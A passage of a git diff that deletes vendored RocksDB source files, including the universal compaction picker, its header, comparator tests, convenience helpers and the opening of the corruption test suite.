-      double sz = candidate_size * (100.0 + ratio) / 100.0;
-      if (sz < static_cast<double>(succeeding_sr->size)) {
-        break;
-      }
-      if (ioptions_.compaction_options_universal.stop_style ==
-          kCompactionStopStyleSimilarSize) {
-        // Similar-size stopping rule: also check the last picked file isn't
-        // far larger than the next candidate file.
-        sz = (succeeding_sr->size * (100.0 + ratio)) / 100.0;
-        if (sz < static_cast<double>(candidate_size)) {
-          // If the small file we've encountered begins a run of similar-size
-          // files, we'll pick them up on a future iteration of the outer
-          // loop. If it's some lonely straggler, it'll eventually get picked
-          // by the last-resort read amp strategy which disregards size ratios.
-          break;
-        }
-        candidate_size = succeeding_sr->compensated_file_size;
-      } else {  // default kCompactionStopStyleTotalSize
-        candidate_size += succeeding_sr->compensated_file_size;
-      }
-      candidate_count++;
-    }
-
-    // Found a series of consecutive files that need compaction.
-    if (candidate_count >= (unsigned int)min_merge_width) {
-      start_index = loop;
-      done = true;
-      break;
-    } else {
-      for (size_t i = loop;
-           i < loop + candidate_count && i < sorted_runs.size(); i++) {
-        const SortedRun* skipping_sr = &sorted_runs[i];
-        char file_num_buf[256];
-        skipping_sr->DumpSizeInfo(file_num_buf, sizeof(file_num_buf), loop);
-        ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Skipping %s",
-                         cf_name.c_str(), file_num_buf);
-      }
-    }
-  }
-  if (!done || candidate_count <= 1) {
-    return nullptr;
-  }
-  size_t first_index_after = start_index + candidate_count;
-  // Compression is enabled if files compacted earlier already reached
-  // size ratio of compression.
-  bool enable_compression = true;
-  int ratio_to_compress =
-      ioptions_.compaction_options_universal.compression_size_percent;
-  if (ratio_to_compress >= 0) {
-    uint64_t total_size = 0;
-    for (auto& sorted_run : sorted_runs) {
-      total_size += sorted_run.compensated_file_size;
-    }
-
-    uint64_t older_file_size = 0;
-    for (size_t i = sorted_runs.size() - 1; i >= first_index_after; i--) {
-      older_file_size += sorted_runs[i].size;
-      if (older_file_size * 100L >= total_size * (long)ratio_to_compress) {
-        enable_compression = false;
-        break;
-      }
-    }
-  }
-
-  uint64_t estimated_total_size = 0;
-  for (unsigned int i = 0; i < first_index_after; i++) {
-    estimated_total_size += sorted_runs[i].size;
-  }
-  uint32_t path_id = GetPathId(ioptions_, estimated_total_size);
-  int start_level = sorted_runs[start_index].level;
-  int output_level;
-  if (first_index_after == sorted_runs.size()) {
-    output_level = vstorage->num_levels() - 1;
-  } else if (sorted_runs[first_index_after].level == 0) {
-    output_level = 0;
-  } else {
-    output_level = sorted_runs[first_index_after].level - 1;
-  }
-
-  // last level is reserved for the files ingested behind
-  if (ioptions_.allow_ingest_behind &&
-      (output_level == vstorage->num_levels() - 1)) {
-    assert(output_level > 1);
-    output_level--;
-  }
-
-  std::vector<CompactionInputFiles> inputs(vstorage->num_levels());
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    inputs[i].level = start_level + static_cast<int>(i);
-  }
-  for (size_t i = start_index; i < first_index_after; i++) {
-    auto& picking_sr = sorted_runs[i];
-    if (picking_sr.level == 0) {
-      FileMetaData* picking_file = picking_sr.file;
-      inputs[0].files.push_back(picking_file);
-    } else {
-      auto& files = inputs[picking_sr.level - start_level].files;
-      for (auto* f : vstorage->LevelFiles(picking_sr.level)) {
-        files.push_back(f);
-      }
-    }
-    char file_num_buf[256];
-    picking_sr.DumpSizeInfo(file_num_buf, sizeof(file_num_buf), i);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: Picking %s", cf_name.c_str(),
-                     file_num_buf);
-  }
-
-  CompactionReason compaction_reason;
-  if (max_number_of_files_to_compact == UINT_MAX) {
-    compaction_reason = CompactionReason::kUniversalSortedRunNum;
-  } else {
-    compaction_reason = CompactionReason::kUniversalSizeRatio;
-  }
-  return new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), output_level,
-      mutable_cf_options.MaxFileSizeForLevel(output_level), LLONG_MAX, path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options, start_level,
-                         1, enable_compression),
-      /* grandparents */ {}, /* is manual */ false, score,
-      false /* deletion_compaction */, compaction_reason);
-}
-
-// Look at overall size amplification. If size amplification
-// exceeeds the configured value, then do a compaction
-// of the candidate files all the way upto the earliest
-// base file (overrides configured values of file-size ratios,
-// min_merge_width and max_merge_width).
-//
-Compaction* UniversalCompactionPicker::PickCompactionToReduceSizeAmp(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, double score,
-    const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer) {
-  // percentage flexibility while reducing size amplification
-  uint64_t ratio =
-      ioptions_.compaction_options_universal.max_size_amplification_percent;
-
-  unsigned int candidate_count = 0;
-  uint64_t candidate_size = 0;
-  size_t start_index = 0;
-  const SortedRun* sr = nullptr;
-
-  // Skip files that are already being compacted
-  for (size_t loop = 0; loop < sorted_runs.size() - 1; loop++) {
-    sr = &sorted_runs[loop];
-    if (!sr->being_compacted) {
-      start_index = loop;  // Consider this as the first candidate.
-      break;
-    }
-    char file_num_buf[kFormatFileNumberBufSize];
-    sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: skipping %s[%d] compacted %s",
-                     cf_name.c_str(), file_num_buf, loop,
-                     " cannot be a candidate to reduce size amp.\n");
-    sr = nullptr;
-  }
-
-  if (sr == nullptr) {
-    return nullptr;  // no candidate files
-  }
-  {
-    char file_num_buf[kFormatFileNumberBufSize];
-    sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: First candidate %s[%" ROCKSDB_PRIszt "] %s",
-        cf_name.c_str(), file_num_buf, start_index, " to reduce size amp.\n");
-  }
-
-  // keep adding up all the remaining files
-  for (size_t loop = start_index; loop < sorted_runs.size() - 1; loop++) {
-    sr = &sorted_runs[loop];
-    if (sr->being_compacted) {
-      char file_num_buf[kFormatFileNumberBufSize];
-      sr->Dump(file_num_buf, sizeof(file_num_buf), true);
-      ROCKS_LOG_BUFFER(
-          log_buffer, "[%s] Universal: Possible candidate %s[%d] %s",
-          cf_name.c_str(), file_num_buf, start_index,
-          " is already being compacted. No size amp reduction possible.\n");
-      return nullptr;
-    }
-    candidate_size += sr->compensated_file_size;
-    candidate_count++;
-  }
-  if (candidate_count == 0) {
-    return nullptr;
-  }
-
-  // size of earliest file
-  uint64_t earliest_file_size = sorted_runs.back().size;
-
-  // size amplification = percentage of additional size
-  if (candidate_size * 100 < ratio * earliest_file_size) {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: size amp not needed. newer-files-total-size %" PRIu64
-        " earliest-file-size %" PRIu64,
-        cf_name.c_str(), candidate_size, earliest_file_size);
-    return nullptr;
-  } else {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] Universal: size amp needed. newer-files-total-size %" PRIu64
-        " earliest-file-size %" PRIu64,
-        cf_name.c_str(), candidate_size, earliest_file_size);
-  }
-  assert(start_index < sorted_runs.size() - 1);
-
-  // Estimate total file size
-  uint64_t estimated_total_size = 0;
-  for (size_t loop = start_index; loop < sorted_runs.size(); loop++) {
-    estimated_total_size += sorted_runs[loop].size;
-  }
-  uint32_t path_id = GetPathId(ioptions_, estimated_total_size);
-  int start_level = sorted_runs[start_index].level;
-
-  std::vector<CompactionInputFiles> inputs(vstorage->num_levels());
-  for (size_t i = 0; i < inputs.size(); ++i) {
-    inputs[i].level = start_level + static_cast<int>(i);
-  }
-  // We always compact all the files, so always compress.
-  for (size_t loop = start_index; loop < sorted_runs.size(); loop++) {
-    auto& picking_sr = sorted_runs[loop];
-    if (picking_sr.level == 0) {
-      FileMetaData* f = picking_sr.file;
-      inputs[0].files.push_back(f);
-    } else {
-      auto& files = inputs[picking_sr.level - start_level].files;
-      for (auto* f : vstorage->LevelFiles(picking_sr.level)) {
-        files.push_back(f);
-      }
-    }
-    char file_num_buf[256];
-    picking_sr.DumpSizeInfo(file_num_buf, sizeof(file_num_buf), loop);
-    ROCKS_LOG_BUFFER(log_buffer, "[%s] Universal: size amp picking %s",
-                     cf_name.c_str(), file_num_buf);
-  }
-
-  // output files at the bottom most level, unless it's reserved
-  int output_level = vstorage->num_levels() - 1;
-  // last level is reserved for the files ingested behind
-  if (ioptions_.allow_ingest_behind) {
-    assert(output_level > 1);
-    output_level--;
-  }
-
-  return new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs),
-      output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-      /* max_grandparent_overlap_bytes */ LLONG_MAX, path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options,
-                         output_level, 1),
-      /* grandparents */ {}, /* is manual */ false, score,
-      false /* deletion_compaction */,
-      CompactionReason::kUniversalSizeAmplification);
-}
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction_picker_universal.h b/thirdparty/rocksdb/db/compaction_picker_universal.h
deleted file mode 100644
index 3f2bed3..0000000
--- a/thirdparty/rocksdb/db/compaction_picker_universal.h
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "db/compaction_picker.h"
-
-namespace rocksdb {
-class UniversalCompactionPicker : public CompactionPicker {
- public:
-  UniversalCompactionPicker(const ImmutableCFOptions& ioptions,
-                            const InternalKeyComparator* icmp)
-      : CompactionPicker(ioptions, icmp) {}
-  virtual Compaction* PickCompaction(const std::string& cf_name,
-                                     const MutableCFOptions& mutable_cf_options,
-                                     VersionStorageInfo* vstorage,
-                                     LogBuffer* log_buffer) override;
-
-  virtual int MaxOutputLevel() const override { return NumberLevels() - 1; }
-
-  virtual bool NeedsCompaction(
-      const VersionStorageInfo* vstorage) const override;
-
- private:
-  struct SortedRun {
-    SortedRun(int _level, FileMetaData* _file, uint64_t _size,
-              uint64_t _compensated_file_size, bool _being_compacted)
-        : level(_level),
-          file(_file),
-          size(_size),
-          compensated_file_size(_compensated_file_size),
-          being_compacted(_being_compacted) {
-      assert(compensated_file_size > 0);
-      assert(level != 0 || file != nullptr);
-    }
-
-    void Dump(char* out_buf, size_t out_buf_size,
-              bool print_path = false) const;
-
-    // sorted_run_count is added into the string to print
-    void DumpSizeInfo(char* out_buf, size_t out_buf_size,
-                      size_t sorted_run_count) const;
-
-    int level;
-    // `file` Will be null for level > 0. For level = 0, the sorted run is
-    // for this file.
-    FileMetaData* file;
-    // For level > 0, `size` and `compensated_file_size` are sum of sizes all
-    // files in the level. `being_compacted` should be the same for all files
-    // in a non-zero level. Use the value here.
-    uint64_t size;
-    uint64_t compensated_file_size;
-    bool being_compacted;
-  };
-
-  // Pick Universal compaction to limit read amplification
-  Compaction* PickCompactionToReduceSortedRuns(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, double score, unsigned int ratio,
-      unsigned int num_files, const std::vector<SortedRun>& sorted_runs,
-      LogBuffer* log_buffer);
-
-  // Pick Universal compaction to limit space amplification.
-  Compaction* PickCompactionToReduceSizeAmp(
-      const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-      VersionStorageInfo* vstorage, double score,
-      const std::vector<SortedRun>& sorted_runs, LogBuffer* log_buffer);
-
-  // Used in universal compaction when the enabled_trivial_move
-  // option is set. Checks whether there are any overlapping files
-  // in the input. Returns true if the input files are non
-  // overlapping.
-  bool IsInputFilesNonOverlapping(Compaction* c);
-
-  static std::vector<SortedRun> CalculateSortedRuns(
-      const VersionStorageInfo& vstorage, const ImmutableCFOptions& ioptions);
-
-  // Pick a path ID to place a newly generated file, with its estimated file
-  // size.
-  static uint32_t GetPathId(const ImmutableCFOptions& ioptions,
-                            uint64_t file_size);
-};
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/comparator_db_test.cc b/thirdparty/rocksdb/db/comparator_db_test.cc
deleted file mode 100644
index 28a2a56..0000000
--- a/thirdparty/rocksdb/db/comparator_db_test.cc
+++ /dev/null
@@ -1,441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <map>
-#include <string>
-
-#include "memtable/stl_wrappers.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/hash.h"
-#include "util/kv_map.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-using std::unique_ptr;
-
-namespace rocksdb {
-namespace {
-
-static const Comparator* comparator;
-
-class KVIter : public Iterator {
- public:
-  explicit KVIter(const stl_wrappers::KVMap* map)
-      : map_(map), iter_(map_->end()) {}
-  virtual bool Valid() const override { return iter_ != map_->end(); }
-  virtual void SeekToFirst() override { iter_ = map_->begin(); }
-  virtual void SeekToLast() override {
-    if (map_->empty()) {
-      iter_ = map_->end();
-    } else {
-      iter_ = map_->find(map_->rbegin()->first);
-    }
-  }
-  virtual void Seek(const Slice& k) override {
-    iter_ = map_->lower_bound(k.ToString());
-  }
-  virtual void SeekForPrev(const Slice& k) override {
-    iter_ = map_->upper_bound(k.ToString());
-    Prev();
-  }
-  virtual void Next() override { ++iter_; }
-  virtual void Prev() override {
-    if (iter_ == map_->begin()) {
-      iter_ = map_->end();
-      return;
-    }
-    --iter_;
-  }
-
-  virtual Slice key() const override { return iter_->first; }
-  virtual Slice value() const override { return iter_->second; }
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  const stl_wrappers::KVMap* const map_;
-  stl_wrappers::KVMap::const_iterator iter_;
-};
-
-void AssertItersEqual(Iterator* iter1, Iterator* iter2) {
-  ASSERT_EQ(iter1->Valid(), iter2->Valid());
-  if (iter1->Valid()) {
-    ASSERT_EQ(iter1->key().ToString(), iter2->key().ToString());
-    ASSERT_EQ(iter1->value().ToString(), iter2->value().ToString());
-  }
-}
-
-// Measuring operations on DB (expect to be empty).
-// source_strings are candidate keys
-void DoRandomIteraratorTest(DB* db, std::vector<std::string> source_strings,
-                            Random* rnd, int num_writes, int num_iter_ops,
-                            int num_trigger_flush) {
-  stl_wrappers::KVMap map((stl_wrappers::LessOfComparator(comparator)));
-
-  for (int i = 0; i < num_writes; i++) {
-    if (num_trigger_flush > 0 && i != 0 && i % num_trigger_flush == 0) {
-      db->Flush(FlushOptions());
-    }
-
-    int type = rnd->Uniform(2);
-    int index = rnd->Uniform(static_cast<int>(source_strings.size()));
-    auto& key = source_strings[index];
-    switch (type) {
-      case 0:
-        // put
-        map[key] = key;
-        ASSERT_OK(db->Put(WriteOptions(), key, key));
-        break;
-      case 1:
-        // delete
-        if (map.find(key) != map.end()) {
-          map.erase(key);
-        }
-        ASSERT_OK(db->Delete(WriteOptions(), key));
-        break;
-      default:
-        assert(false);
-    }
-  }
-
-  std::unique_ptr<Iterator> iter(db->NewIterator(ReadOptions()));
-  std::unique_ptr<Iterator> result_iter(new KVIter(&map));
-
-  bool is_valid = false;
-  for (int i = 0; i < num_iter_ops; i++) {
-    // Random walk and make sure iter and result_iter returns the
-    // same key and value
-    int type = rnd->Uniform(6);
-    ASSERT_OK(iter->status());
-    switch (type) {
-      case 0:
-        // Seek to First
-        iter->SeekToFirst();
-        result_iter->SeekToFirst();
-        break;
-      case 1:
-        // Seek to last
-        iter->SeekToLast();
-        result_iter->SeekToLast();
-        break;
-      case 2: {
-        // Seek to random key
-        auto key_idx = rnd->Uniform(static_cast<int>(source_strings.size()));
-        auto key = source_strings[key_idx];
-        iter->Seek(key);
-        result_iter->Seek(key);
-        break;
-      }
-      case 3:
-        // Next
-        if (is_valid) {
-          iter->Next();
-          result_iter->Next();
-        } else {
-          continue;
-        }
-        break;
-      case 4:
-        // Prev
-        if (is_valid) {
-          iter->Prev();
-          result_iter->Prev();
-        } else {
-          continue;
-        }
-        break;
-      default: {
-        assert(type == 5);
-        auto key_idx = rnd->Uniform(static_cast<int>(source_strings.size()));
-        auto key = source_strings[key_idx];
-        std::string result;
-        auto status = db->Get(ReadOptions(), key, &result);
-        if (map.find(key) == map.end()) {
-          ASSERT_TRUE(status.IsNotFound());
-        } else {
-          ASSERT_EQ(map[key], result);
-        }
-        break;
-      }
-    }
-    AssertItersEqual(iter.get(), result_iter.get());
-    is_valid = iter->Valid();
-  }
-}
-
-class DoubleComparator : public Comparator {
- public:
-  DoubleComparator() {}
-
-  virtual const char* Name() const override { return "DoubleComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-#ifndef CYGWIN
-    double da = std::stod(a.ToString());
-    double db = std::stod(b.ToString());
-#else
-    double da = std::strtod(a.ToString().c_str(), 0 /* endptr */);
-    double db = std::strtod(a.ToString().c_str(), 0 /* endptr */);
-#endif
-    if (da == db) {
-      return a.compare(b);
-    } else if (da > db) {
-      return 1;
-    } else {
-      return -1;
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-class HashComparator : public Comparator {
- public:
-  HashComparator() {}
-
-  virtual const char* Name() const override { return "HashComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    uint32_t ha = Hash(a.data(), a.size(), 66);
-    uint32_t hb = Hash(b.data(), b.size(), 66);
-    if (ha == hb) {
-      return a.compare(b);
-    } else if (ha > hb) {
-      return 1;
-    } else {
-      return -1;
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-class TwoStrComparator : public Comparator {
- public:
-  TwoStrComparator() {}
-
-  virtual const char* Name() const override { return "TwoStrComparator"; }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() >= 2);
-    assert(b.size() >= 2);
-    size_t size_a1 = static_cast<size_t>(a[0]);
-    size_t size_b1 = static_cast<size_t>(b[0]);
-    size_t size_a2 = static_cast<size_t>(a[1]);
-    size_t size_b2 = static_cast<size_t>(b[1]);
-    assert(size_a1 + size_a2 + 2 == a.size());
-    assert(size_b1 + size_b2 + 2 == b.size());
-
-    Slice a1 = Slice(a.data() + 2, size_a1);
-    Slice b1 = Slice(b.data() + 2, size_b1);
-    Slice a2 = Slice(a.data() + 2 + size_a1, size_a2);
-    Slice b2 = Slice(b.data() + 2 + size_b1, size_b2);
-
-    if (a1 != b1) {
-      return a1.compare(b1);
-    }
-    return a2.compare(b2);
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-}  // namespace
-
-class ComparatorDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-  Options last_options_;
-  std::unique_ptr<const Comparator> comparator_guard;
-
- public:
-  ComparatorDBTest() : env_(Env::Default()), db_(nullptr) {
-    comparator = BytewiseComparator();
-    dbname_ = test::TmpDir() + "/comparator_db_test";
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  ~ComparatorDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-    comparator = BytewiseComparator();
-  }
-
-  DB* GetDB() { return db_; }
-
-  void SetOwnedComparator(const Comparator* cmp) {
-    comparator_guard.reset(cmp);
-    comparator = cmp;
-    last_options_.comparator = cmp;
-  }
-
-  // Return the current option configuration.
-  Options* GetOptions() { return &last_options_; }
-
-  void DestroyAndReopen() {
-    // Destroy using last options
-    Destroy();
-    ASSERT_OK(TryReopen());
-  }
-
-  void Destroy() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  Status TryReopen() {
-    delete db_;
-    db_ = nullptr;
-    last_options_.create_if_missing = true;
-
-    return DB::Open(last_options_, dbname_, &db_);
-  }
-};
-
-TEST_F(ComparatorDBTest, Bytewise) {
-  for (int rand_seed = 301; rand_seed < 306; rand_seed++) {
-    DestroyAndReopen();
-    Random rnd(rand_seed);
-    DoRandomIteraratorTest(GetDB(),
-                           {"a", "b", "c", "d", "e", "f", "g", "h", "i"}, &rnd,
-                           8, 100, 3);
-  }
-}
-
-TEST_F(ComparatorDBTest, SimpleSuffixReverseComparator) {
-  SetOwnedComparator(new test::SimpleSuffixReverseComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    std::vector<std::string> source_prefixes;
-    // Randomly generate 5 prefixes
-    for (int i = 0; i < 5; i++) {
-      source_prefixes.push_back(test::RandomHumanReadableString(&rnd, 8));
-    }
-    for (int j = 0; j < 20; j++) {
-      int prefix_index = rnd.Uniform(static_cast<int>(source_prefixes.size()));
-      std::string key = source_prefixes[prefix_index] +
-                        test::RandomHumanReadableString(&rnd, rnd.Uniform(8));
-      source_strings.push_back(key);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 30, 600, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, Uint64Comparator) {
-  SetOwnedComparator(test::Uint64Comparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-    Random64 rnd64(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      uint64_t r = rnd64.Next();
-      std::string str;
-      str.resize(8);
-      memcpy(&str[0], static_cast<void*>(&r), 8);
-      source_strings.push_back(str);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, DoubleComparator) {
-  SetOwnedComparator(new DoubleComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      uint32_t r = rnd.Next();
-      uint32_t divide_order = rnd.Uniform(8);
-      double to_divide = 1.0;
-      for (uint32_t j = 0; j < divide_order; j++) {
-        to_divide *= 10.0;
-      }
-      source_strings.push_back(ToString(r / to_divide));
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, HashComparator) {
-  SetOwnedComparator(new HashComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      source_strings.push_back(test::RandomKey(&rnd, 8));
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-TEST_F(ComparatorDBTest, TwoStrComparator) {
-  SetOwnedComparator(new TwoStrComparator());
-
-  for (int rnd_seed = 301; rnd_seed < 316; rnd_seed++) {
-    Options* opt = GetOptions();
-    opt->comparator = comparator;
-    DestroyAndReopen();
-    Random rnd(rnd_seed);
-
-    std::vector<std::string> source_strings;
-    // Randomly generate source keys
-    for (int i = 0; i < 100; i++) {
-      std::string str;
-      uint32_t size1 = rnd.Uniform(8);
-      uint32_t size2 = rnd.Uniform(8);
-      str.append(1, static_cast<char>(size1));
-      str.append(1, static_cast<char>(size2));
-      str.append(test::RandomKey(&rnd, size1));
-      str.append(test::RandomKey(&rnd, size2));
-      source_strings.push_back(str);
-    }
-
-    DoRandomIteraratorTest(GetDB(), source_strings, &rnd, 200, 1000, 66);
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/convenience.cc b/thirdparty/rocksdb/db/convenience.cc
deleted file mode 100644
index 8ee31ca..0000000
--- a/thirdparty/rocksdb/db/convenience.cc
+++ /dev/null
@@ -1,58 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/convenience.h"
-
-#include "db/db_impl.h"
-#include "util/cast_util.h"
-
-namespace rocksdb {
-
-void CancelAllBackgroundWork(DB* db, bool wait) {
-  (static_cast_with_check<DBImpl, DB>(db->GetRootDB()))
-      ->CancelAllBackgroundWork(wait);
-}
-
-Status DeleteFilesInRange(DB* db, ColumnFamilyHandle* column_family,
-                          const Slice* begin, const Slice* end) {
-  return (static_cast_with_check<DBImpl, DB>(db->GetRootDB()))
-      ->DeleteFilesInRange(column_family, begin, end);
-}
-
-Status VerifySstFileChecksum(const Options& options,
-                             const EnvOptions& env_options,
-                             const std::string& file_path) {
-  unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  InternalKeyComparator internal_comparator(options.comparator);
-  ImmutableCFOptions ioptions(options);
-
-  Status s = ioptions.env->NewRandomAccessFile(file_path, &file, env_options);
-  if (s.ok()) {
-    s = ioptions.env->GetFileSize(file_path, &file_size);
-  } else {
-    return s;
-  }
-  unique_ptr<TableReader> table_reader;
-  std::unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(file), file_path));
-  s = ioptions.table_factory->NewTableReader(
-      TableReaderOptions(ioptions, env_options, internal_comparator,
-                         false /* skip_filters */, -1 /* level */),
-      std::move(file_reader), file_size, &table_reader,
-      false /* prefetch_index_and_filter_in_cache */);
-  if (!s.ok()) {
-    return s;
-  }
-  s = table_reader->VerifyChecksum();
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/corruption_test.cc b/thirdparty/rocksdb/db/corruption_test.cc
deleted file mode 100644
index 56e1578..0000000
--- a/thirdparty/rocksdb/db/corruption_test.cc
+++ /dev/null
@@ -1,518 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-
-#include <errno.h>
-#include <fcntl.h>
-#include <inttypes.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-#include "db/db_impl.h"
-#include "db/log_format.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/table.h"
-#include "rocksdb/write_batch.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-static const int kValueSize = 1000;
-
-class CorruptionTest : public testing::Test {
- public:
-  test::ErrorEnv env_;
-  std::string dbname_;
-  shared_ptr<Cache> tiny_cache_;
-  Options options_;
-  DB* db_;
-
-  CorruptionTest() {
-    // If LRU cache shard bit is smaller than 2 (or -1 which will automatically
-    // set it to 0), test SequenceNumberRecovery will fail, likely because of a
-    // bug in recovery code. Keep it 4 for now to make the test passes.
-    tiny_cache_ = NewLRUCache(100, 4);
-    options_.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-    options_.env = &env_;
-    dbname_ = test::TmpDir() + "/corruption_test";
-    DestroyDB(dbname_, options_);
-
-    db_ = nullptr;
-    options_.create_if_missing = true;
-    BlockBasedTableOptions table_options;
-    table_options.block_size_deviation = 0;  // make unit test pass for now
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen();
-    options_.create_if_missing = false;
-  }
-
-  ~CorruptionTest() {
-     delete db_;
-     DestroyDB(dbname_, Options());
-  }
-
-  void CloseDb() {
-    delete db_;
-    db_ = nullptr;
-  }
-
-  Status TryReopen(Options* options = nullptr) {
-    delete db_;
-    db_ = nullptr;
-    Options opt = (options ? *options : options_);
-    opt.env = &env_;
-    opt.arena_block_size = 4096;
-    BlockBasedTableOptions table_options;
-    table_options.block_cache = tiny_cache_;
-    table_options.block_size_deviation = 0;
-    opt.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    return DB::Open(opt, dbname_, &db_);
-  }
-
-  void Reopen(Options* options = nullptr) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void RepairDB() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(::rocksdb::RepairDB(dbname_, options_));
-  }
-
-  void Build(int n, int flush_every = 0) {
-    std::string key_space, value_space;
-    WriteBatch batch;
-    for (int i = 0; i < n; i++) {
-      if (flush_every != 0 && i != 0 && i % flush_every == 0) {
